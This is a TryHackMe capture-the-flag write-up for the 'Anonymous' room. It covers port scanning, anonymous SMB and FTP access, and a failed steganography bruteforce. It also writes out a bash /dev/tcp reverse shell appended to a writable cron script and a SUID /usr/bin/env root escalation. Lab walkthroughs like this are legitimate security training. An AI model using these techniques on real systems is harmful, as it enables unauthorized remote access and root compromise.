Anonymous
This is a free room on the TryHackMe platform created by the NamelessOne. The room is a medium difficulty room that looks to prove one’s understanding of the linux fundamentals by trying to acquire two flags - the user and root flags.
Where you see the variable $victim in the scripts, this refers to the IP of the victim machine that is set in the attacker’s console prior to commencing the attack:
> victim=10.10.168.207
Let’s perform an enumeration first using Rustscan whilst using nmap parameters:
> rustscan -a $victim -r 1-65535 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________ [111/148]
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/bob/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to se
nsitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image,
or up the Ulimit with '--ulimit 5000'.
Open 10.10.168.207:21
Open 10.10.168.207:22
Open 10.10.168.207:139
Open 10.10.168.207:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 18:08 EAT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating Ping Scan at 18:08
Scanning 10.10.168.207 [2 ports]
Completed Ping Scan at 18:08, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:08
Scanning 10.10.168.207 [4 ports]
Discovered open port 139/tcp on 10.10.168.207
Discovered open port 445/tcp on 10.10.168.207 [72/148]
Discovered open port 22/tcp on 10.10.168.207
Discovered open port 21/tcp on 10.10.168.207
Completed Connect Scan at 18:08, 0.17s elapsed (4 total ports)
Initiating Service scan at 18:08
Scanning 4 services on 10.10.168.207
Completed Service scan at 18:08, 11.60s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.168.207.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
NSE: [ftp-bounce 10.10.168.207:21] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 7.28s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 1.71s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 10.10.168.207
Host is up, received conn-refused (0.17s latency).
Scanned at 2021-05-21 18:08:26 EAT for 22s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.16.238
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3 [36/148]
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA
1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8q
j3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+
4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsF
rcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
| 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ANONYMOUS<00> Flags: <unique><active>
| ANONYMOUS<03> Flags: <unique><active>
| ANONYMOUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59762/tcp): CLEAN (Couldn't connect) [0/148]
| Check 2 (port 14879/tcp): CLEAN (Couldn't connect)
| Check 3 (port 35330/udp): CLEAN (Failed to receive data)
| Check 4 (port 63992/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2021-05-21T15:08:39+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-21T15:08:39
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
Notice that there is an SMB service running on port 445. We can attempt to enumerate it using smbmap to see whether there are any folders that we can access without user credentials:
> smbmap -H $victim
Guest session IP: 10.10.168.207:445 Name: 10.10.168.207
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
pics READ ONLY My SMB Share Directory for Pics
IPC$ NO ACCESS IPC Service (anonymous server (Samba, Ubuntu))
So there is a folder that we can access and possibly find new information. Let’s use smbclient to connect to the folder and see what’s in it:
> smbclient -U guest \\\\$victim\\pics
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 14:11:34 2020
.. D 0 Thu May 14 04:59:10 2020
corgo2.jpg N 42663 Tue May 12 03:43:42 2020
puppos.jpeg N 265188 Tue May 12 03:43:42 2020
20508240 blocks of size 1024. 13306808 blocks available
smb: \> download corgo2.jpg puppos.jpeg
download: command not found
smb: \> get puppos.jpeg
getting file \puppos.jpeg of size 265188 as puppos.jpeg (150.7 KiloBytes/sec) (average 150.7 KiloBytes/sec)
smb: \> get corgo2.jpg
getting file \corgo2.jpg of size 42663 as corgo2.jpg (38.9 KiloBytes/sec) (average 39.2 KiloBytes/sec)
smb: \> exit
Performing an analysis of the files using exiftools at first seems not to have anything useful so we can assume that some sort of steganography is possibly being used on the files.
Let’s use steghide to examine the files:
steghide info corgo2.jpg
"corgo2.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(bob㉿kabob)-[/mnt/…/Developer/ctf/thm/anonymousV6]
└─$ steghide info puppos.jpeg 1 ⨯
"puppos.jpeg":
format: jpeg
capacity: 13.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Both files require a password in order to extract hidden information in the file. Re-examining the image files using exiftools again seem to have some interesting information in one of the attributes that appear like a list of words that could be used to perform a bruteforce password attack on the image files.
For the bruteforce, we shall use stegseek with the wordlist.
# Re-examining the exiftool contents of the puppos.jpeg file shows a list of words on the Keywords attribute:
> exiftool puppos.jpeg | grep Keywords
Keywords : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
# We can extract this into a wordlist file titled 'wordlist.txt' that can be used for the bruteforce attack.
> exiftool puppos.jpeg | grep Keywords | cut -d ':' -f2 | tr [:space:] -d | tr ',' '\n' | tee wordlist.txt
danimal
ddog
dpembroke
dcorgi
dwelsh
dcute
dcanine
dhappy
dbreed
dportrait
dpedigree
dgrass
dposing
doutdoor
dhappiness
dnature
dfriend
dgreen
dfunny
dsummer
dbeautiful
dlooking
dcolor
dpurebred
dadorable
dplaying
dbrown
dsmile
dsmiling
dfun
dstanding
dsmall
dfriendly
dcheerful
dyoung
dview
dbackground
dpark
dlife
dlittle
dwalk
dtongue
denjoy
dpet
dears
dpretty
ddomestic
dlovely
dhorizontal
dsun
dgrass
dpark
dportraitd
# Use stegseek to bruteforce the image files:
> stegseek corgo2.jpg wordlist.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: Could not find a valid passphrase.
> stegseek puppos.jpeg wordlist.txt 1 ⨯
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: Could not find a valid passphrase.
It seemed the wordlist was a dead-end and instead led us down a rabbit hole. Looking through the enumeration data again, we notice that the server has an FTP service too on port 21, and testing this with the anonymous account, we were able to get access to a number of files.
> ftp $victim 21
Connected to 10.10.168.207.
220 NamelessOne's FTP Server!
Name (10.10.168.207:bob): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 6622 May 21 16:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (202.6706 kB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (6622 bytes).
226 Transfer complete.
6622 bytes received in 0.01 secs (761.0683 kB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (39.3869 kB/s)
ftp> exit
221 Goodbye.
What stood out is that the data seems to be a result of running some sort of a script running in cron job. The clean.sh seems to be the script.
Working with this assumption, we can attempt to put a reverse shell bash script in this file and attempt to upload the file back into the folder. We then establish a listener on the attacker machine and capture the call made by the victim machine to establish a remote shell back to the victim machine. Listing the contents of the current working directory will reveal the user.txt flag.
# Append the reverse listener to the clean.sh script
> echo "bash -c 'exec bash -i &>/dev/tcp/10.11.16.238/4444 <&1'" >> clean.sh
# Upload the script back into the ftp folder
> ftp $victim 21
Connected to 10.10.71.50.
220 NamelessOne's FTP Server!
Name (10.10.71.50:bob): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd scripts
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1591 May 21 20:52 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> put clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
394 bytes sent in 0.00 secs (244.1406 kB/s)
ftp> exit
221 Goodbye.
# Establish a listener on the attack machine to listen for the remote shell connection
> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.16.238] from (UNKNOWN) [10.10.71.50] 37128
bash: cannot set terminal process group (1443): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$
# List the contents to find the user.txt flag.
> namelessone@anonymous:~$ ls
ls
pics
user.txt
We can then import and run linpeas.sh on the victim machine to identify potential vulnerabilities that may be used to attack the machine. Running linpeas.sh helps identify the program /usr/bin/env that does not usually have the SID bit set on most systems. This can allow us to escalate our privileges to root and allow us to get the root flag.
# Read about how to import linpeas.sh remotely from the attack machine to a victim machine.
# Extract of the linpeas.sh output is shown below.
> chmod +x linpeas.sh && ./linpeas.sh
...
════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/9066/bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/9066/bin/ping
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env # Here is the program of interest
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-- 1 root dip 386K Jun 12 2018 /snap/core/8268/usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
...
# Let's run a new shell whilst maintaining the privileges of the escalated user (root)
> /usr/bin/env -C /root /bin/sh -p
> ls
ls
root.txt
And with that the room is complete!